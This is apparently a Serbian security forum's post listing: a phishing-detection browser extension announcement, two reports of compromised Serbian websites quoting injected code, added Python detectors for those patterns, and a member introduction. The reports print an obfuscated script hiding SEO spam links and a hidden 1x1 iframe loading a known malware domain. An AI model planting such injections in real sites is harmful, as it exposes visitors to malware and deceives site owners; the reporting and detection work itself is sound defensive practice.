DeepPhish (browser extension) |
Posted by: bane - 09-29-2022, 02:19 AM - Forum: Alati, servisi i tutorijali
- Replies (21)
|
|
Greetings everyone,
For some time now I have been thinking about publishing the code from an interesting experiment I worked on in my free days.
It is a Chrome extension that consists of two features: detection and inspection of sites while browsing.
Detection is done with an ML random forest algorithm that is light enough to run in the browser in real time with a pre-trained model.
Every site has its own score, which is determined by analysing its source code. In addition, this plugin remembers if a site's security score changes over time for better or for worse, in the case of defacement etc. The document on phishing characteristics on which the analysis is based is in the repository.
As for inspection, through the context menu, i.e. by right-clicking on the background of any site, you get to the "Inspect Page with DeepPhish" option.
The result of the inspection, as well as its progress, is displayed together with all the detected features of the site. In the background, besides free tools, the APIs of several well-known sites are used, which provide info about the domain, DNS, whois and other information ... For the API keys you only need to register; a free account is mostly enough, unless you make an unusually large number of requests.
Basically this is a bundle of everything that occurred to me as necessary for passive defence and basic inspection, without having to fire up several tools for one thing.
All the details, the dataset, models and images are in the repo on GitHub: https://github.com/Omodaka9375/DeepPhish
I think this is an OK tool for educational purposes and that anyone can adapt it as they wish, plug in other APIs, add features etc.
If it helps someone save a bit of time, great
|
|
|
Hidden ads on contractor.rs |
Posted by: 1van - 09-28-2022, 06:56 PM - Forum: Kompromitovani resursi
- No Replies
|
|
Detected back in March, server is Loopia: https://twitter.com/ivanmarkovicsec/stat...4906699776.
Code: <div name="LcOkne" id="FQfMnG">
<a href="http://www.atleticoarezzo.it/">UGG Saldi</a>
<a href="http://www.associazionespazzavento.it/">Stivali UGG</a>
<a href="http://www.agendacultura.it/">UGG Saldi</a>
<a href="http://www.rumeniinitalia.it/">UGG Outlet</a>
<a href="http://www.anspilecce.it">Stivali UGG</a>
<a href="http://www.montanolucino-ut.it">UGG Outlet</a>
<a href="http://www.mtdirectionsk.it">Stivali UGG</a>
<a href="http://www.bkvietnam.dk/">UGG Sko</a>
<a href="http://www.altieco.dk/">UGG Australia</a>
<a href="http://www.vinboden.dk">Billige UGG</a>
<a href="/teletext/ralph-lauren-vaska.html" title="ralph lauren väska">ralph lauren väska</a>
<a href="/teletext/ralph-lauren-skjorta.html" title="ralph lauren skjorta">ralph lauren skjorta</a>
<a href="/teletext/ralph-lauren-jacka-herr.html" title="ralph lauren jacka herr">ralph lauren jacka herr</a>
<a href="/teletext/ralph-lauren-parfym-dam.html" title="ralph lauren parfym dam">ralph lauren parfym dam</a>
<a href="/teletext/polo-ralph-lauren-skor.html" title="polo ralph lauren skor">polo ralph lauren skor</a>
<a href="/teletext/ralph-lauren-skjorta-dam.html" title="ralph lauren skjorta dam">ralph lauren skjorta dam</a>
</div><script language="JavaScript">var _0x6977=["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x73\x74\x79\x6C\x65","\x46\x51\x66\x4D\x6E\x47","\x64\x69\x73\x70\x6C\x61\x79","\x6E\x6F\x6E\x65"];document[_0x6977[0]](_0x6977[2])[_0x6977[1]][_0x6977[3]]=_0x6977[4]</script>
</body>
Code: De-obfuscated code: var _0x6977 = ["getElementById", "style", "FQfMnG", "display", "none"];
Whois:
Quote:Registrant: Contractor D.O.O.
Address: Brdjanska 458, Ripanj, Beograd, Srbija
Registration number: 07487436
Tax ID (PIB): 101745588
Administrative contact: Ilmak D.O.O.
Address: Cincar Jankova 7, Beograd, Srbija
Technical contact: Loopia d.o.o.
Address: Obrenovićeva 46, TPC KALČA C1/72, Nis, Srbija
Registration number: 17503626
|
|
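Added example (not code from the post or its author): a Python check for the pattern shown in this post, where an inline script with a hex-escaped `_0x…` string table hides an element full of links. It inlines the string table, then reports which element ids are set to `display:none` and how many links each contains; the link URLs in the sample are constructed placeholders, and the function and class names are this example's own.

```python
import re
from html.parser import HTMLParser

# Script as quoted in the post; link list shortened to constructed example.test URLs.
SAMPLE = r'''<div name="LcOkne" id="FQfMnG">
<a href="http://shop1.example.test/">UGG Saldi</a>
<a href="http://shop2.example.test/">UGG Outlet</a>
<a href="/teletext/page.html">ralph lauren</a>
</div><script language="JavaScript">var _0x6977=["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x73\x74\x79\x6C\x65","\x46\x51\x66\x4D\x6E\x47","\x64\x69\x73\x70\x6C\x61\x79","\x6E\x6F\x6E\x65"];document[_0x6977[0]](_0x6977[2])[_0x6977[1]][_0x6977[3]]=_0x6977[4]</script>'''

def deobfuscate(js):
    """Inline a `var _0xNNNN=[...]` string table and return dot-notation JS."""
    m = re.search(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\];?', js, re.S)
    if not m:
        return js
    unhex = lambda s: re.sub(r'\\x([0-9a-fA-F]{2})', lambda h: chr(int(h.group(1), 16)), s)
    table = [unhex(s) for s in re.findall(r'"((?:[^"\\]|\\.)*)"', m.group(2))]
    code = re.sub(re.escape(m.group(1)) + r'\[(\d+)\]',
                  lambda i: '"%s"' % table[int(i.group(1))], js[m.end():])
    return re.sub(r'\["(\w+)"\]', r'.\1', code)

class Page(HTMLParser):  # collects inline scripts, counts <a> tags per ancestor id
    def __init__(self):
        super().__init__()
        self.stack, self.links, self.scripts, self.in_script = [], {}, [], False
    def handle_starttag(self, tag, attrs):
        self.stack.append((tag, dict(attrs).get("id")))
        self.in_script = tag == "script"
        if self.in_script:
            self.scripts.append("")
        if tag == "a":
            for el_id in {i for _, i in self.stack if i}:
                self.links[el_id] = self.links.get(el_id, 0) + 1
    def handle_endtag(self, tag):
        self.in_script = False
        if any(t == tag for t, _ in self.stack):
            while self.stack.pop()[0] != tag:
                pass
    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data

def hidden_link_blocks(html):
    """Return {element id: link count} for elements a script sets to display:none."""
    page = Page()
    page.feed(html)
    pat = r'getElementById\("([^"]+)"\)\.style\.display\s*=\s*"none"'
    hidden = {i for js in page.scripts for i in re.findall(pat, deobfuscate(js))}
    return {i: page.links[i] for i in hidden if i in page.links}
```
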
|
Forgotten malware link on df.rs |
Posted by: 1van - 09-28-2022, 06:47 PM - Forum: Kompromitovani resursi
- No Replies
|
|
Detected back in March, the server is Loopia: https://twitter.com/ivanmarkovicsec/stat...6026613761. If they have not seen this, who knows what else is there.
Code: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sajt u izradi</title>
</head>
<frameset rows="*">
<frame src="http://www.loopia.co.yu/under_construction/" />
</frameset>
</html>
<iframe heigth="1" width="1" frameborder="0" src="http://alcobro.net/t.php?id=3661989"></iframe>
The domain alcobro.net is mentioned in several places, but for example here as well: https://github.com/stamparm/maltrail/blo...istory.txt.
Whois:
Quote:Registrant: Df Doo
Address: Slobodna Zona Beograd, Beograd, Srbija
Registration number: 17588931
Tax ID (PIB): 103607506
Administrative contact: Df Doo
Address: Slobodna Zona Beograd, Beograd, Srbija
Technical contact: Loopia D.O.O.
Address: Obrenovićeva bb, TPC KALČA C1/72, Niš, Srbija
Registration number: 17503626
|
|
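Added example (not from the post or its author): a Python check for the injection shown in this post, an off-site iframe of near-zero size appended after the closing `</html>` tag. The hosts in the sample are constructed placeholders, and `site_host` (the site's own hostname) and the function names are this example's assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the post; all hosts are example.test placeholders.
SAMPLE = '''<html><head><title>Sajt u izradi</title></head>
<frameset rows="*"><frame src="http://parking.example.test/under_construction/" /></frameset>
</html>
<iframe heigth="1" width="1" frameborder="0" src="http://tracker.example.test/t.php?id=1"></iframe>'''

def _tiny(value):
    """True for a 0 or 1 pixel dimension such as "1", "0" or "1px"."""
    m = re.match(r'\s*(\d+)', value or "")
    return bool(m) and int(m.group(1)) <= 1

class FrameAudit(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host, self.after_html, self.findings = site_host, False, []
    def handle_endtag(self, tag):
        if tag == "html":
            self.after_html = True  # anything parsed from here on was appended
    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "frame"):
            return
        a = dict(attrs)
        host = urlparse(a.get("src") or "").hostname or self.site_host
        external = host != self.site_host and not host.endswith("." + self.site_host)
        reasons = []
        # any(), not all(): the sample misspells "height", so only width is really set
        if any(_tiny(a.get(k)) for k in ("width", "height")):
            reasons.append("tiny")
        if self.after_html:
            reasons.append("after </html>")
        if external and reasons:
            self.findings.append((a.get("src"), reasons))

def suspicious_frames(html, site_host):
    """Return (src, reasons) for off-site frames that are tiny or follow </html>."""
    audit = FrameAudit(site_host)
    audit.feed(html)
    return audit.findings
```
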
|
Hi everyone |
Posted by: Aleksandar.Dj. - 09-28-2022, 09:44 AM - Forum: O Vama
- Replies (3)
|
|
Hello, I came across the forum through Ivan's post on LinkedIn about the ransomware infection of the cadastre network.
I have been in IT for a long time, but I only recently started taking an interest in security. For a while now I have been missing a good forum like the old elitesecurity, for example.
I am hoping for smart discussions and I greet everyone.
|
|
|
|